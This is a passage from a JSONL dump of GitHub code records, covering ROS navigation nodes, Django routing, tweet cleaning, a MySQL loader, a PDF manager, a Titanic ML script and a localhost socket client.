cls.from_packages(packages.values())\n\n @classmethod\n @abstractmethod\n def _build_package(cls, app_instance: \"AppInstance\", path: str) -> PT:\n ...\n\n @classmethod\n def build(cls,\n app_instance: \"AppInstance\",\n paths: t.Optional[t.List[str]] = None\n ) -> \"PackageDatabase[PT]\":\n if paths is None:\n paths = cls._determine_paths(app_instance)\n db_package = cls.from_paths(app_instance, paths)\n return db_package\n\n @classmethod\n @abstractmethod\n def _determine_paths(cls, app_instance: \"AppInstance\") -> t.List[str]:\n ...\n\n @classmethod\n @abstractmethod\n def from_dict(cls, d: t.List[t.Dict[str, t.Any]]) -> \"PackageDatabase[PT]\":\n ...\n\n def to_dict(self) -> t.List[t.Dict[str, t.Any]]:\n return [p.to_dict() for p in self.values()]\n\n def __len__(self) -> int:\n \"\"\"Returns the number of packages within this database.\"\"\"\n return len(self._contents)\n\n def __getitem__(self, name: str) -> PT:\n \"\"\"Fetches the description for a given package.\n\n Raises\n ------\n KeyError\n if no package exists with the given name.\n \"\"\"\n return self._contents[name]\n\n def __iter__(self) -> t.Iterator[str]:\n \"\"\"\n Returns an iterator over the names of the packages contained within\n this database.\n \"\"\"\n yield from self._contents\n\n def get_package_definition(self, package: Package, app_instance: \"AppInstance\") -> PackageDefinition:\n \"\"\"\n Return the contents of the package.xml file associated with the package.\n\n This function reads the package.xml on-demand, and then returns a cached copy thereafter.\n\n Parameters\n ----------\n package: Package\n The package to get the definition of\n app_instance: AppInstance\n The AppInstance that contains the defintion\n\n Returns\n -------\n PackageDefinition\n The definition of the pacakge as defined in package.xml\n \"\"\"\n if package.name in self._definitions:\n return self._definitions[package.name]\n\n package_xml = os.path.join(package.path, \"package.xml\")\n if not app_instance.files.isfile(package_xml):\n raise ValueError(f'No package.xml for package \"{package.name}\" in \"{package.path}')\n\n contents = app_instance.files.read(package_xml)\n defn = parse_package_string(contents, filename=package_xml)\n self._definitions[package.name] = defn\n return defn\n","repo_name":"rosqual/roswire","sub_path":"src/roswire/common/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":6082,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"19"} +{"seq_id":"35679471638","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom .views import (\n CharactersViewset,\n QuotesViewset,\n FavoriteCharacterView,\n FavoriteQuoteAndCharacterView,\n FavoritesViewset\n)\n\n\nrouter = DefaultRouter(trailing_slash=False)\nrouter.register(r'characters', CharactersViewset)\nrouter.register(r'^characters/(?P\\d+)/quotes', QuotesViewset, basename='character_quotes')\nrouter.register(r'favorites', FavoritesViewset)\n\n\nurlpatterns = [\n path('', include(router.urls)),\n path('characters//favorites', FavoriteCharacterView.as_view()),\n path('characters//quotes//favorites', FavoriteQuoteAndCharacterView.as_view())\n]","repo_name":"Ezenwankwo/aspirechallenge","sub_path":"movie/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"44194967925","text":"#! /usr/bin/env python\n\n'''navigation using MoveBase and the navigation stack\n\nIn a way very similar to how the :any:`node-bug-m` acts, this node\nimplements a composite behaviour which drives the robot towards a target\nplus a final orientation. But in this case, the node uses MoveBase uses\nthe navigation stack to reach the final position. \n\nAuthors\n\tprof. Carmine Recchiuto (UniGe), Francesco Ganci (S4143910)\n\nVersion:\n\tv1.5.0\n'''\n\nimport rospy\nimport os\nfrom std_srvs.srv import SetBool, SetBoolRequest, SetBoolResponse\nfrom std_srvs.srv import Empty, EmptyRequest, EmptyResponse\nfrom geometry_msgs.msg import Point\nfrom tf import transformations\nimport math\nfrom nav_msgs.msg import Odometry\nfrom move_base_msgs.msg import MoveBaseActionGoal\nfrom actionlib_msgs.msg import GoalID\n\n\n\nactive_ = False\n''' the activity status of the node. \n'''\n\n\n\nservice_move_base_switch = \"/nav_stack_switch\"\n''' name of the service to trigger the state of the node\n'''\n\nsrv_move_base_switch = None\n''' service handle for :any:`service_move_base_switch`\n'''\n\ndef move_base_switch( data ):\n\t''' used for switching the activity status of the node. \n\t\n\tThe node also updates the target, reading the new one from the parameters\n\tserver. \n\t\n\tArguments:\n\t\tdata (SetBool) :\n\t\t\tthe boolean SetBool.data inside the message is the new activity status\n\t\n\tNote:\n\t\tbefore calling the service, make sure the three ros parameters\n\t\t'des_pos_x' , 'des_pos_y' and 'des_yaw' have been set.\n\t\n\tTodo:\n\t\tdifferently from the other behavioural nodes, this node requires\n\t\tto be retriggered using this service each time the objective changes. \n\t\tthis could be a desin issue. The node should update automatically\n\t\tthe objective when it changes. \n\t'''\n\t\n\tglobal active_\n\tglobal desired_position_, desired_yaw_\n\t\n\tres = SetBoolResponse( )\n\tres.success = True\n\tres.message = \"\"\n\t\n\t# check the activity status\n\tif active_ and not data.data:\n\t\t# rospy.loginfo( \"(move_base_nav ) move_base navigation is OFF\" )\n\t\tactive_ = False\n\t\tchange_state( 0 )\n\t\t\n\telif not active_ and data.data:\n\t\t#rospy.loginfo( \"(move_base_nav ) move_base navigation is ON\" )\n\t\tactive_ = True\n\t\t\n\telif active_ and data.data:\n\t\t#rospy.loginfo( \"(move_base_nav ) switching target\" )\n\t\tpass\n\t\n\telse:\n\t\tres.message = \"trying to disable something already off ...\" \n\t\n\tif active_:\n\t\tdesired_position_.x = rospy.get_param( \"des_pos_x\" )\n\t\tdesired_position_.y = rospy.get_param( \"des_pos_y\" )\n\t\tdesired_yaw_ = rospy.get_param( \"des_yaw\" )\n\t\t\n\t\t#rospy.loginfo( f\"(move_base_nav ) new target is (x={desired_position_.x}, y={desired_position_.y}, yaw={desired_yaw_})\" )\n\t\n\treturn res\n\n\n\nservice_move_base_signal = \"/nav_stack_signal\"\n''' the node assumes that some other node implements this client, used\n\tfor sending the signal when the robot reaches the objective. \n'''\n\ncl_move_base_signal = None\n''' (service client handle) client for :any:`service_move_base_signal`\n'''\n\ndef send_signal( ):\n\t''' send a signal through the service :any:`service_move_base_signal`\n\t\tif available. \n\t'''\n\tglobal cl_move_base_signal\n\tglobal service_move_base_signal\n\t\n\tif cl_move_base_signal == None:\n\t\t#rospy.loginfo( f\"(move_base_nav ) TRYING client {service_move_base_signal} ... \" )\n\t\trospy.sleep(rospy.Duration(1))\n\t\tcl_move_base_signal = rospy.ServiceProxy( service_move_base_signal, Empty )\n\t\tif cl_move_base_signal == None:\n\t\t\t#rospy.loginfo( f\"(move_base_nav ) unable to connect with {service_move_base_signal} -- retrying later...\" )\n\t\t\treturn\n\t\t\t\n\t\telse:\n\t\t\t#rospy.loginfo( f\"(move_base_nav ) FOUND SERVICE {service_move_base_signal}\" )\n\t\t\tpass\n\t\n\tif cl_move_base_signal != None:\n\t\ttry:\n\t\t\tcl_move_base_signal( )\n\t\texcept rospy.ServiceException:\n\t\t\t#rospy.loginfo( f\"(move_base_nav ) unable to connect with {service_move_base_signal} -- service call failed\" )\n\t\t\tcl_move_base_signal = None\n\n\n\nservice_head_orient_switch = \"/head_orient_switch\"\n''' service name for the head orientation\n'''\n\ncl_head_orient_switch = None\n''' (client handle) client to enable and disable the head orientation\n'''\n\n\n\n# current values\n\nposition_ = Point( )\n''' the current position of the robot, from the odometry\n'''\n\nyaw_ = 0.0\n''' the orientation of the robot about the 'z' axis, from the odometry\n''' \n\n# target\n\ndesired_position_ = Point( )\n''' the objective position for move_base. obtained from the parameters\n\t'des_pos_x' and 'des_pos_y'\n''' \ndesired_position_.x = 0.0\ndesired_position_.y = 0.0\ndesired_position_.z = 0.0\n\ndesired_yaw_ = 0.0\n''' the current orientation of the robot\n'''\n\n# error evaluation\n\nerr_pos = math.inf\n''' teh error between the desired position and the current one.\n\nNote:\n\tif the position is not measured, the distance will be always infinite. \n'''\n\nerr_yaw = math.pi/2.0\n''' the error between the current orientation and the desired one. \n\nNote:\n\tits default value is PI/2, and also when the distance is not measured\n'''\n\n# thresholds\n\nthreshold_position_ = 0.35\n''' the maximum allowed position error while reaching the target. \n'''\n\nyaw_precision_ = math.pi / 9 \n''' +/- 20 degree allowed\n'''\n\nyaw_precision_2_ = math.pi / 90\n''' +/- 2 degree allowed\n'''\n\n# odometry measurement\n\ntopic_odometry = \"/odom\"\n''' the node measures the position of the robot during the navigation.\n'''\n\nsub_odometry = None\n''' (subscription handle) subscription to the odometry\n'''\n\ndef normalize_angle( angle ):\n\t''' angle normalization between -PI and PI.\n\t\n\tNote:\n\t\tthe parameter \"angle\" is the err_yaw in this implementation.\n\t'''\n\tif(math.fabs(angle) > math.pi):\n\t\tangle = angle - (2 * math.pi * angle) / (math.fabs(angle))\n\treturn angle\n\n\ndef cbk_odometry( msg ):\n\t''' subscription callback for the odometry topic\n\t'''\n\tglobal active_\n\tglobal position_, yaw_\n\tglobal desired_position_, desired_yaw_\n\tglobal err_pos, err_yaw\n\t\n\tif active_:\n\t\t# position\n\t\tposition_ = msg.pose.pose.position\n\n\t\t# yaw\n\t\tquaternion = (\n\t\t\tmsg.pose.pose.orientation.x,\n\t\t\tmsg.pose.pose.orientation.y,\n\t\t\tmsg.pose.pose.orientation.z,\n\t\t\tmsg.pose.pose.orientation.w)\n\t\teuler = transformations.euler_from_quaternion(quaternion)\n\t\tyaw_ = euler[2]\n\t\t\n\t\t# estimation of errors\n\t\terr_pos = math.sqrt(pow(desired_position_.y - position_.y, 2) + pow(desired_position_.x - position_.x, 2))\n\t\terr_yaw = normalize_angle(desired_yaw_ - yaw_)\n\t\t\n\telse:\n\t\t# set defaults\n\t\terr_pos = math.inf\n\t\terr_yaw = math.pi / 2.0\n\n\n\ntopic_move_base_goal = \"/move_base/goal\"\n''' the topic for sending the target to the navigation stack\n'''\n\npub_move_base_goal = None\n''' (publisher handle) move base goal\n'''\n\ndef move_base_send_target( x, y ):\n\t''' send a target to move base. \n\t\n\tParameters:\n\t\tx (float) : \n\t\t\tthe x coordinate\n\t\ty (float) : \n\t\t\tthe y coordinate\n\t'''\n\tglobal topic_move_base_goal, pub_move_base_goal\n\t\n\tmsg = MoveBaseActionGoal( )\n\tmsg.header.frame_id = \"map\"\n\tmsg.goal.target_pose.header.frame_id = \"map\"\n\t\n\tmsg.goal.target_pose.pose.position.x = x\n\tmsg.goal.target_pose.pose.position.y = y\n\tmsg.goal.target_pose.pose.position.z = 0.0\n\tmsg.goal.target_pose.pose.orientation.x = 0.0\n\tmsg.goal.target_pose.pose.orientation.y = 0.0\n\tmsg.goal.target_pose.pose.orientation.z = 0.0\n\tmsg.goal.target_pose.pose.orientation.w = 1.0\n\t\n\tpub_move_base_goal.publish( msg )\n\trospy.sleep( rospy.Duration(1) )\n\n\n\ntopic_move_base_cancel = \"/move_base/cancel\"\n''' name of the topic for cancelling the navigation request\n'''\n\npub_move_base_cancel = None\n''' (publisher handle) the publisher for cancelling the request\n'''\n\ndef move_base_cancel_goal( ):\n\t''' send a cancellation request to move_base\n\t'''\n\tglobal topic_move_base_cancel, pub_move_base_cancel\n\t\n\tmsg = GoalID( )\n\t\n\tpub_move_base_cancel.publish( msg )\n\trospy.sleep( rospy.Duration(1) )\n\n\n\nstate_ = 0\n''' the current state of the node\n'''\n\ndef change_state( state ):\n\t''' state transition from the current one to the one in the argument.\n\t''' \n\tglobal state_ \n\tglobal cl_head_orient_switch\n\tglobal desired_position_\n\tglobal state_description\n\t\n\tstate_ = state\n\t\n\tif state_ == 0: # -- idle\n\t\tstate_description = \"idle -- waiting for a target\"\n\t\tcl_head_orient_switch( False )\n\t\tmove_base_cancel_goal( )\n\t\n\telif state_ == 1: # -- move_base planning\n\t\tstate_description = \"motion planning -- sending the request to move_base\"\n\t\tcl_head_orient_switch( False )\n\t\tmove_base_cancel_goal( )\n\t\tmove_base_send_target( desired_position_.x, desired_position_.y )\n\t\n\telif state_ == 2: # -- move_base motion\n\t\tstate_description = \"navigation -- going towards the target\"\n\t\tcl_head_orient_switch( False )\n\t\n\telif state_ == 3: # -- head_orientation behaviour\n\t\tstate_description = \"head orientation\"\n\t\tmove_base_cancel_goal( )\n\t\tcl_head_orient_switch( True )\n\t\n\telif state_ == 4: # -- send signal (end of the motion)\n\t\tstate_description = \"SUCCESS. sending signal\"\n\t\tcl_head_orient_switch( False )\n\t\tmove_base_cancel_goal( )\n\t\t\n\t\n\telse:\n\t\t#rospy.logwarn( f\"(move_base_nav ) WARNING: unknown state {state_}\" )\n\t\tchange_state( 0 )\n\n\n\nreplan_time = 30 # seconds\n''' the planner, in case the robot is requiring too much time for reaching\n\tthe point, can do a replanning request\n'''\n\nworking_rate = 10 # Hz\n''' the working rate is the maximum update frequency of this node. the status\n\tis checked with a frequency of 'working_rate' Hz.\n'''\n\nstate_description = \"\"\n''' just a message to make clear the current status of the node\n'''\n\ndef main( ):\n\t''' state machine implementation\n\t'''\n\tglobal active_, state_\n\tglobal err_pos, err_yaw\n\tglobal threshold_position_, yaw_precision_2_\n\tglobal replan_time, working_rate\n\tglobal state_description\n\t\n\t'''\n\twhile not rospy.is_shutdown():\n\t\tif active_:\n\t\t\trospy.loginfo( \"ON\" )\n\t\telse:\n\t\t\trospy.loginfo( \"OFF\" )\n\t'''\n\t\n\t'''\n\trospy.spin( )\n\t'''\n\t\n\tr = rospy.Rate( working_rate )\n\telapsed_time = 0.0\n\ttime_unit = rospy.Duration( 1/working_rate )\n\tprev_output = \"\"\n\twhile not rospy.is_shutdown( ):\n\t\t\n\t\t# wait (in any case)\n\t\tr.sleep( )\n\t\t\n\t\t# check active status\n\t\tif not active_:\n\t\t\tcontinue\n\t\t\n\t\t# update the goal\n\t\tdesired_position_.x = rospy.get_param( \"des_pos_x\" )\n\t\tdesired_position_.y = rospy.get_param( \"des_pos_y\" )\n\t\tdesired_yaw_ = rospy.get_param( \"des_yaw\" )\n\t\t\n\t\t# run the state machine\n\t\tif state_ == 0: # -- idle\n\t\t\tif err_pos > threshold_position_:\n\t\t\t\tchange_state( 1 )\n\t\t\telif err_yaw > yaw_precision_2_ :\n\t\t\t\tchange_state( 2 )\n\t\t\n\t\telif state_ == 1: # -- move_base planning\n\t\t\telapsed_time = 0.0\n\t\t\tchange_state( 2 )\n\t\t\n\t\telif state_ == 2: # -- move_base motion\n\t\t\telapsed_time = elapsed_time + time_unit.to_sec()\n\t\t\t\n\t\t\tif elapsed_time > replan_time:\n\t\t\t\t#rospy.loginfo( f\"(move_base_nav ) replanning move_base (timer expired, max {replan_time})\" )\n\t\t\t\tchange_state( 1 ) # -- replanning\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tif err_pos < threshold_position_:\n\t\t\t\tif err_yaw > yaw_precision_2_:\n\t\t\t\t\tchange_state( 3 ) # -- orientation\n\t\t\t\telse:\n\t\t\t\t\tchange_state( 4 ) # -- end of the task\n\t\t\n\t\telif state_ == 3: # -- head_orientation behaviour\n\t\t\tif err_yaw <= yaw_precision_2_:\n\t\t\t\tchange_state( 4 )\n\t\t\n\t\telif state_ == 4: # -- send signal (end of the motion)\n\t\t\tsend_signal( )\n\t\t\tchange_state( 0 )\n\t\t\n\t\telse:\n\t\t\t#rospy.logwarn( f\"(move_base_nav ) WARNING: unknown state {state_}\" )\n\t\t\tchange_state( 0 )\n\t\t\n\t\t# output : current status\n\t\tif prev_output != state_description:\n\t\t\t#rospy.loginfo( f\"(move_base_nav ) current state = {state_} ({state_description})\" )\n\t\t\tprev_output = state_description\n\n\n\ndef on_shut( ):\n\trospy.loginfo( f\"(move_base_nav ) closing...\" )\n\n\n\nif __name__ == \"__main__\":\n\trospy.init_node( \"move_base_nav\" )\n\trospy.on_shutdown( on_shut )\n\t\n\t# rospy.loginfo( f\"(move_base_nav )\" )\n\t\n\t#rospy.loginfo( f\"(move_base_nav ) starting...\" )\n\trospy.sleep(rospy.Duration(2))\n\t\n\tif not rospy.has_param( \"des_pos_x\" ) or not rospy.has_param( \"des_pos_y\" ) or not rospy.has_param( \"des_yaw\" ):\n\t\t#rospy.logerr( \"(move_base_nav ) ERROR: parameters not found in the parameter server!\" )\n\t\t\n\t\trospy.shutdown( )\n\t\trospy.sleep(rospy.Duration(1))\n\t\t\n\t\tos.exit( )\n\t\n\t#rospyloginfo( f\"(move_base_nav ) service {service_move_base_switch} ... \" )\n\tsrv_move_base_switch = rospy.Service( service_move_base_switch, SetBool, move_base_switch )\n\t#rospy.loginfo( f\"(move_base_nav ) service {service_move_base_switch} ... OK\" )\n\t\n\t#rospy.loginfo( f\"(move_base_nav ) subscription: {topic_odometry} ... \" )\n\tsub_odometry = rospy.Subscriber( topic_odometry , Odometry, cbk_odometry )\n\trospy.sleep(rospy.Duration(1))\n\t#rospy.loginfo( f\"(move_base_nav ) subscription: {topic_odometry} ... OK\" )\n\t\n\t#rospy.loginfo( f\"(move_base_nav ) client: {service_head_orient_switch} ... \" )\n\tcl_head_orient_switch = rospy.ServiceProxy( service_head_orient_switch, SetBool )\n\trospy.sleep(rospy.Duration(1))\n\t#rospy.loginfo( f\"(move_base_nav ) client: {service_head_orient_switch} ... OK\" )\n\t\n\t#rospy.loginfo( f\"(move_base_nav ) publisher: {topic_move_base_goal} ... \" )\n\tpub_move_base_goal = rospy.Publisher( topic_move_base_goal, MoveBaseActionGoal, queue_size=10 )\n\t#rospy.loginfo( f\"(move_base_nav ) publisher: {topic_move_base_goal} ... OK\" )\n\t\n\t#rospy.loginfo( f\"(move_base_nav ) publisher: {topic_move_base_cancel} ... \" )\n\tpub_move_base_cancel = rospy.Publisher( topic_move_base_cancel, GoalID, queue_size=10 )\n\t#rospy.loginfo( f\"(move_base_nav ) publisher: {topic_move_base_cancel} ... OK\" )\n\t\n\trospy.sleep(rospy.Duration(2))\n\t\n\t#rospy.loginfo( f\"(move_base_nav ) ready\" )\n\tmain( )\n","repo_name":"programmatoroSeduto/ExperimentalRoboticsLab-Assignment-3","sub_path":"robocluedo_movement_controller/scripts/move_base_nav.py","file_name":"move_base_nav.py","file_ext":"py","file_size_in_byte":13216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"7561517725","text":"import pandas as pd\nimport numpy as np\nimport string\nimport re\n\nTRAIN_RATIO = .7\n\ndef clean_tweet_text(tweet):\n try:\n tweet = re.sub(r'\\\\\\'9[0-9]', '', tweet)\n tweet = tweet.translate(str.maketrans('', '', string.punctuation))\n words = tweet.split(' ')\n\n for index, word in enumerate(words):\n if 'https' in word:\n del words[index]\n\n return ' '.join(words)\n\n except:\n return None\n\ndef normalize_retweet(tweet):\n if tweet[0:3] == 'RT ':\n return tweet[3:]\n else:\n return tweet\n\nif __name__ == '__main__':\n data_raw = pd.read_csv(\"TrumpTweets.csv\")\n data_raw['text'] = data_raw['text'].apply(clean_tweet_text)\n \n data = data_raw[data_raw['text'] != '']\n data = data[data['text'].notnull()]\n data = data[(data['is_retweet'] == 'false') | (data['is_retweet'] == 'true')]\n data = data.sample(frac = 1)\n\n data = data.reset_index(drop=True)\n data.to_csv('trump_with_rts.csv')\n\n data['text'] = data['text'].apply(normalize_retweet)\n data.to_csv('trump_with_rts_normalized.csv')\n\n no_rts = data[data['is_retweet'] == 'false']\n no_rts.to_csv(\"trump_clean.csv\")\n","repo_name":"goobta/Presidental-Tweet-Analysis","sub_path":"analysis/trump_tweets/clean_trump.py","file_name":"clean_trump.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"46013980968","text":"#!/usr/local/bin/python\n# -*- encoding: utf-8 -*-\n\nimport MySQLdb # sudo pip install MySQL-python\nimport sys\nimport pprint\nimport math\nimport csv\n\n# オブジェクトの標準出力をインデント化\npp = pprint.PrettyPrinter(indent=2)\n \n# DBへログイン\nconnection = MySQLdb.connect(user=\"hatena\", host=\"localhost\", passwd=\"hatena\", db=\"hatena_bookmark\", charset='utf8')\ncursor = connection.cursor()\n\n# テーブル存在の確認\ncursor.execute(\"SHOW TABLES FROM hatena_bookmark like 'stoplist'\")\nif(cursor.fetchone() == None):\n cursor.execute(\"CREATE TABLE stoplist (id int(11) NOT NULL AUTO_INCREMENT, name varchar(128) NOT NULL, morpheme_id int(11), PRIMARY KEY (id))\")\n\n# 既存データの削除\nprint(\">> stoplistテーブルのデータをtruncate(削除)します.\")\ncursor.execute(\"TRUNCATE TABLE stoplist\");\n\n# _dic_stoplist.dat を morphemeテーブルに登録\n# _dic_stoplist.dat: [morpheme]\nprint(\">> ./data/stoplist.datの各形態素について,morpheme_idを取得します.\")\nstopmorpheme_morphemeId = []\nf = open(\"./data/stoplist.dat\", 'rU')\nreader = csv.reader(f, delimiter=' ')\nfor line in reader:\n stopmorpheme = line[0]\n cursor.execute(\n \"SELECT id FROM morpheme WHERE name = %s\", \n [stopmorpheme])\n res = cursor.fetchone()\n morpheme_id = -1\n if isinstance(res, tuple):\n morpheme_id = res[0]\n stopmorpheme_morphemeId += [[stopmorpheme, morpheme_id]]\nf.close()\n\nprint(\">> stoplistテーブルに登録します.\")\nfor line in stopmorpheme_morphemeId:\n if line[1] != -1:\n cursor.execute(\n \"INSERT INTO stoplist (id, name, morpheme_id) VALUES (null, %s, %s)\", \n [line[0], line[1]])\n else:\n cursor.execute(\n \"INSERT INTO stoplist (id, name, morpheme_id) VALUES (null, %s, null)\",\n [line[0]])\nconnection.commit()\n\n# DBから切断\ncursor.close()\nconnection.close()\n\nprint(\">> stoplistテーブルに登録が完了しました.\")\n","repo_name":"KenshoFujisaki/CreateHatenaBookmarkLogDB","sub_path":"scripts/set_stoplist_to_db.py","file_name":"set_stoplist_to_db.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"3365499712","text":"from utilss import *\n\nimport datetime\n\ndevice = connect_device()\n\n# 生成时间戳\ntimestamp = datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\")\nclick_matchposition('image/ui/dailysource/dailysource_psychgramanalysis.PNG',device, timestamp)\ntimestamp2 = time.strftime(\"%Y%m%d%H%M%S\", time.localtime())\nclick_matchposition('image/ui/dailysource/dailysource_psy_level/dailysource_psy_level_666.PNG', device, timestamp2)","repo_name":"Lupich0322/OpencvScript","sub_path":"src/test/mainTest.py","file_name":"mainTest.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"48548523103","text":"import pyttsx3\nimport PyPDF2\nfrom PyPDF2 import *\nfrom tkinter import * \nfrom tkinter import filedialog\nimport os\ndef audiobook():\n speaker=pyttsx3.init()\n speaker.say(\"please ...select the PDF which i will read for u sir\")\n speaker.runAndWait() \n book=filedialog.askopenfilename()\n speaker.say(\"choose the page no. sir\")\n speaker.runAndWait()\n p=int(input(\"enter page no.\"))\n pdfReader=PyPDF2.PdfFileReader(book)\n pages=pdfReader.numPages\n speaker.setProperty('rate',130)\n voices=speaker.getProperty('voices')\n speaker.setProperty('voice',voices[0])\n page=pdfReader.getPage(p-1)\n text=page.extractText()\n speaker.say(text)\n speaker.runAndWait()\ndef pdfsplitter():\n speaker=pyttsx3.init()\n speaker.say(\"please ...select your file....sir..\")\n speaker.runAndWait()\n book=filedialog.askopenfilename()\n pdf_reader=PyPDF2.PdfFileReader(book)\n pdf_file=open('your new pdf.pdf','wb')\n speaker.say(\"please ...enter your page numbers sir....sir..\")\n speaker.runAndWait()\n print(\"enter ur page nos.\")\n l=list(map(int,input().split()))\n pdf_writer=PyPDF2.PdfFileWriter()\n for i in l:\n page=pdf_reader.getPage(i)\n pdf_writer.addPage(page) \n pdf_writer.write(pdf_file)\ndef pdfmerger():\n speaker=pyttsx3.init()\n speaker.say(\"please ...enter the number of PDFs.... u want to enter\")\n speaker.runAndWait()\n n=int(input(\"no.of pdf to merge\"))\n pdf=[]\n Pdfwriter=PyPDF2.PdfFileWriter()\n root=Tk()\n root.update()\n root.withdraw()\n speaker=pyttsx3.init()\n speaker.say(\"please ...select your files....sir..\")\n speaker.runAndWait()\n for i in range(n):\n pdf_to_merge=filedialog.askopenfilename()\n root.withdraw()\n root.update()\n pdf.append(pdf_to_merge) \n for j in pdf:\n pdfReader=PyPDF2.PdfFileReader(open(j,'rb'))\n for page in range(pdfReader.numPages):\n pageobj=pdfReader.getPage(page)\n Pdfwriter.addPage(pageobj)\n pdfoutput=open(\"new_file\"+'.pdf','wb')\n Pdfwriter.write(pdfoutput)\n pdfoutput.close()\n root.destroy()\n\nspeak=pyttsx3.init()\nspeak.say(\"Hello ..........sir....... i am your personal PDF manager ......... please say what can i do for u ....... \")\nspeak.say(\"choose the corresponding number for the action u want to do with your PDF.\")\nspeak.runAndWait()\nprint(\"1.Use Audiobook\\n2.Use PDF Splitter\\n3. Use PDF Merger\")\ncommand=int(input())\nif command==1:\n speake=pyttsx3.init()\n speake.say(\"wait sir .......we were opening Audio..book..\")\n speake.runAndWait()\n audiobook()\nelif command==2:\n speake=pyttsx3.init()\n speake.say(\"wait sir .......we were opening PDF.. splitter...\")\n speake.runAndWait()\n pdfsplitter()\nelif command==3:\n speake=pyttsx3.init()\n speake.say(\"wait sir .......we were opening PDF.....Merger..\")\n speake.runAndWait()\n pdfmerger()\nelse:\n speake=pyttsx3.init()\n speak(\"please enter valid number\")\n speake.runAndWait()\n \n\n\n\n\n \n\n\n\n","repo_name":"souvenger/PDF_MANAGER","sub_path":"pdfmanager.py","file_name":"pdfmanager.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31120884830","text":"from matplotlib.pyplot import *\r\nimport numpy as np\r\n\r\n\r\ndef readHtm():\r\n dict={}\r\n infile = open('./city_temp/citylistWorld.htm', 'r')\r\n for i in range(1,261):\r\n infile.readline()\r\n for line in infile:\r\n if 'mso-list' in line:\r\n key= line.split('')[0].split('')[1].strip(' ( ')\r\n if 'href=\"ftp' in line:\r\n value= line.split('>')[1].strip('= minimo and len (texto) < maximo\n print(logitud)\n\ntexto = input(\"escribe un mensaje: \")\npalabra()\n","repo_name":"jamesalejandromelendez/ADSO-B","sub_path":"segundo trimestre/enero/punto3(operadores logicos)/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"70667401004","text":"from decouple import config\nfrom nola_slackbots.bot import bot_creater\n\nTOKEN = config(\"OAUTH_ACCESS_TOKEN\")\nBOT_CHANNEL_ID = config(\"BOT_CHANNEL\")\nBOT_DISPLAY_NAME_ID = config(\"BOT_DISPLAY_NAME\")\nTOPIC = config(\"TOPIC\")\nTITLE_LINE_NUMBER = config(\"TITLE_LINE_NUMBER\", cast=int)\n\nrtm = bot_creater(\n token=TOKEN,\n bot_channel_id=BOT_CHANNEL_ID,\n bot_display_name_id=BOT_DISPLAY_NAME_ID,\n topic=TOPIC,\n title_line_number=TITLE_LINE_NUMBER,\n)\n\nif __name__ == \"__main__\":\n rtm.start()\n","repo_name":"dgnsrekt/nola-python-slackbot-project","sub_path":"run_bot.py","file_name":"run_bot.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20354202874","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 22 16:36:20 2021\n\n@author: cannon\n\"\"\"\nfrom datamanagement.analyze_data import load_titanic_data,save_prediction\nfrom datamanagement.split_data import split_data\nfrom datamanagement.data_clean import clean_data_pipelines,clean_data_manually\nfrom models.Model import Model\nfrom constants import data_constants as const\n\nmodelobj = Model()\n\n#model_name = const.BEST_MODEL_ID\nmodel_name = const.SVM_MODEL_MANUALLY\nis_svm= False\n\nif (not modelobj.load_model(model_name)):\n data=load_titanic_data()\n train_set, test_set = split_data(data)\n train_data,train_labels=train_set.drop(\"Survived\",axis=1),train_set[\"Survived\"]\n #train_data_cleaned=clean_data_pipelines(train_data)\n train_data_cleaned=clean_data_manually(train_data)\n print(\"datos limpiados\")\n modelobj.validacion_cruzada(train_data_cleaned, train_labels)\n modelobj.fine_tuning(train_data_cleaned,train_labels,is_svm)\n print(\"fine tuning done\")\n modelobj.validacion_cruzada(train_data_cleaned, train_labels)\n modelobj.train(train_data_cleaned,train_labels)\n print(\"modelo entrenado\")\n test_data,test_labels=test_set.drop(\"Survived\",axis=1),test_set[\"Survived\"]\n #test_data_cleaned=clean_data_pipelines(test_data)\n test_data_cleaned=clean_data_manually(test_data)\n prediction=modelobj.predict(test_data_cleaned)\n modelobj.print_estadisticas(test_labels, prediction)\n modelobj.save_model(model_name)\n#sacamos los resultados finales\nprint(\"Empeanzo la prediccion\")\nprediction_dataset = load_titanic_data(train_flag=False)\nfinal_data_prepared = clean_data_manually(prediction_dataset)\nfinal_prediction = modelobj.predict(final_data_prepared)\nprint(\"antes de salvar\")\nsave_prediction(final_prediction,prediction_dataset[\"PassengerId\"])\nprint(\"Finalizado\")\n\n","repo_name":"ercannon/titanic","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30192963780","text":"# Updated: 04/04/20\n# With this file you can create a simple server/client connection]\n# This example runs a server on your local machine then run the client to establish\n# the communication among client server\nimport socket\n\nsock_ = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nsock_.connect((\"127.0.0.1\",9337))\nmsg = sock_.recv(1024) #How many bytes you want to 